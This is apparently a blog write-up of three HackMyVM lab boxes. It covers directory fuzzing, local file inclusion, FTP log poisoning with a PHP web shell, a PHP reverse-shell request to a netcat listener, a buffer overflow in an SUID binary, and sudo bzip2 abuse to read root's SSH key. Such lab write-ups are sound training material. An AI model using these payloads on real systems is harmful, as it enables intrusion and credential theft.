I’ve done a few more HackMyVM boxes: Superhuman, Brain and Eyes. Superhuman and Brain were Easy rated, Eyes is Medium.


This was essentially weaponised guessing, followed by GTFOBins privesc (I think, I didn’t take notes). The only interesting (?) command was this one:

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u -fc 403 -ac -v -fw 18

Also I guess ciphey was actually useful which tbh was a first for me:

└─# cat ../superhuman/notes-tips.txt 

└─# cat ../superhuman/plaintext 
└─# ciphey -f notes-tips.txt    
Possible plaintext: "salome doesn't want me, I'm so sad... i'm sure god is dead... \nI drank 6 liters of Paulaner.... too drunk lol. I'll write her a poem and
she'll desire me. I'll name it salome_and_?? I don't know.\n\nI must not forget to save it and put a good extension because I don't have much storage." (y/N):y


This was an LFI to obtain a password for the foothold and then connecting to an internal service to get another password for the privesc. The only interesting part here was that the file to include was /proc/sched_debug which doesn’t appear in the standard seclists entries for LFI fuzzing. So that was interesting.

GET /brainstorm/file.php?file=/proc/sched_debug HTTP/1.1

└─# grep -r sched_debug
# crickets chirping
└─# echo '/proc/sched_debug' >> custom-linux.txt


This was another LFI, but this time we had access to an anonymous FTP server which gave us the LFI parameter straight up so no fuzzing required. No write access to FTP.

└─# ftp                                                                                                                                    
Connected to
220 (vsFTPd 3.0.3)
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lash
229 Entering Extended Passive Mode (|||45956|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        113          4096 Apr 04  2021 .
drwxr-xr-x    2 0        113          4096 Apr 04  2021 ..
-rw-r--r--    1 0        0             125 Apr 04  2021 index.php
226 Directory send OK.
ftp> get index.php
local: index.php remote: index.php
229 Entering Extended Passive Mode (|||45633|)
150 Opening BINARY mode data connection for index.php (125 bytes).
100% |***************************************************************************************************************************|   125       54.03 KiB/s    00:00 ETA
226 Transfer complete.
125 bytes received in 00:00 (45.89 KiB/s)
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||11328|)
550 Permission denied.

What’s in the file?

└─# cat index.php                      
$file = $_GET['fil3'];
print("Here my eyes...");
<!--Monica's eyes-->

So we have a username, and anyway we can include /etc/passwd and confirm. Monica doesn’t have an SSH key (spoiler alert) so we can’t read it even if we had permission, which we don’t. We can include /var/log/vsftpd.log so that means we can log poison:

└─# ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( '<?php system($_GET['cmd']);?>'
331 Please specify the password.
530 Login incorrect.
ftp: Login failed
ftp> exit
221 Goodbye.


GET /index.php?fil3=/var/log/vsftpd.log&cmd=php+-r+'$sock%3dfsockopen("",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1


└─# nc -nvlp 1234                                         
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 43308
/bin/sh: 0: cant access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@eyes:~/html$ ls -lash
ls -lash
total 12K
4.0K drwxr-xr-x 2 root root 4.0K Apr  4  2021 .
4.0K drwxr-xr-x 3 root root 4.0K Apr  4  2021 ..
4.0K -rw-r--r-- 1 root root  125 Apr  4  2021 index.php


This was the most interesting part here. We have an SUID binary in /opt/ls, along with some C code and a note (the note says something about creating a new version of ls).

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

int main(void)
 char command[100];
 char ls[50]="/usr/bin/ls";
 char name[50];
 printf("Enter your name:");
 printf("Hi %s, Im executing ls\n Output:\n",name);

So here we the ability to overflow:

www-data@eyes:/opt$ ./ls
Enter your name:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaidididididididid
Hi aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaidididididididid, Im executing ls
uid=1000(monica) gid=33(www-data) groups=33(www-data)

So now just change the last ‘id’ to ‘sh’ and get a shell. Privesc is GTFOBins:

User monica may run the following commands on eyes:
    (ALL) NOPASSWD: /usr/bin/bzip2

This gives us a privileged read, and root has an SSH key:

monica@eyes:/etc$ sudo -u root /usr/bin/bzip2 -c /root/.ssh/id_rsa | bzip2 -d
sudo -u root /usr/bin/bzip2 -c /root/.ssh/id_rsa | bzip2 -d
# etc

So it’s copy, chmod, login and grab the flag.